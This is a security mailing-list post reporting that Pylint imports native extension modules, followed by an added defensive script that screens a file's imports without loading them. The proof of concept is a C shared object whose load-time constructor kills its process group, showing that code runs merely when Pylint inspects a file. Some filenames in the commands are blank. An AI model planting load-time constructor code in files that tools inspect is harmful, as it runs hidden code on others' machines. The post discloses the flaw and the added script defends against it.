Date: Mon, 29 Sep 2014 14:32:21 +0200
From: Jakub Wilk <>
Subject: Pylint checks not as static as one would think

Pylint[0] is advertised as "a static code checker, meaning it can 
analyse your code without actually running it"[1] and that it "does 
not import live modules"[1].

This is, unfortunately, far from reality. Here's a PoC:

$ cat
from _moo import *

$ cat moo.c
#include <stdio.h>
#include <signal.h>
/* Runs as soon as the shared object is loaded, i.e. when the module is imported. */
void __attribute__((constructor)) moo() {
	kill(0, SIGSEGV);
}

$ gcc -Wall -shared -fPIC moo.c -o

$ pylint
No config file found, using default configuration
Segmentation fault

My understanding is that upstream Pylint maintainers consider this 
behavior intentional[2]. But even then, I think it's a serious 
documentation flaw.

Should a CVE ID be assigned to this bug? If yes, it should be a 


Jakub Wilk
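
A defensive pre-screen in the spirit of the issue above, added here as an example and not part of Jakub Wilk's post: it lists a file's imports using only `ast` and asks `importlib.util.find_spec` how each top-level module would be loaded (for a top-level name this consults the finders but executes no module code), so an import that would pull in a compiled extension, as `_moo` does in the PoC, is visible before any tool that really imports modules is run on the file. The sample source and the `_moo` name are constructed to mirror the PoC.

```python
"""Pre-screen a Python file for imports a non-static checker would execute.
Nothing here imports the inspected modules (added example, not from the post)."""
import ast
import importlib.machinery as machinery
import importlib.util
from typing import Dict, List

# Constructed sample mirroring the PoC: a wildcard import of a module that
# exists only as a compiled extension, next to two ordinary imports.
SAMPLE_SOURCE = """\
from _moo import *
import json
import os.path
"""


def imported_modules(source: str) -> List[str]:
    """Top-level module names imported by `source`, found via ast only."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])   # relative imports are skipped
    return sorted(names)


def classify(name: str) -> str:
    """Say how top-level module `name` would be loaded, without loading it."""
    try:
        spec = importlib.util.find_spec(name)
    except (ImportError, ValueError):
        return "missing"
    if spec is None:
        return "missing"
    loader = spec.loader
    if isinstance(loader, machinery.ExtensionFileLoader):
        return "extension"   # native code: constructors run at import time
    if loader in (machinery.BuiltinImporter, machinery.FrozenImporter):
        return "builtin"
    return "source"


def screen(source: str) -> Dict[str, str]:
    """Map each imported top-level module to how it would be loaded."""
    return {name: classify(name) for name in imported_modules(source)}


if __name__ == "__main__":
    for module, kind in screen(SAMPLE_SOURCE).items():
        print(f"{module:12} {kind}")
```

Any module reported as `extension` would run native code the moment a checker imports it; `missing` here only means the sample's `_moo.so` is not on `sys.path` in this environment.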
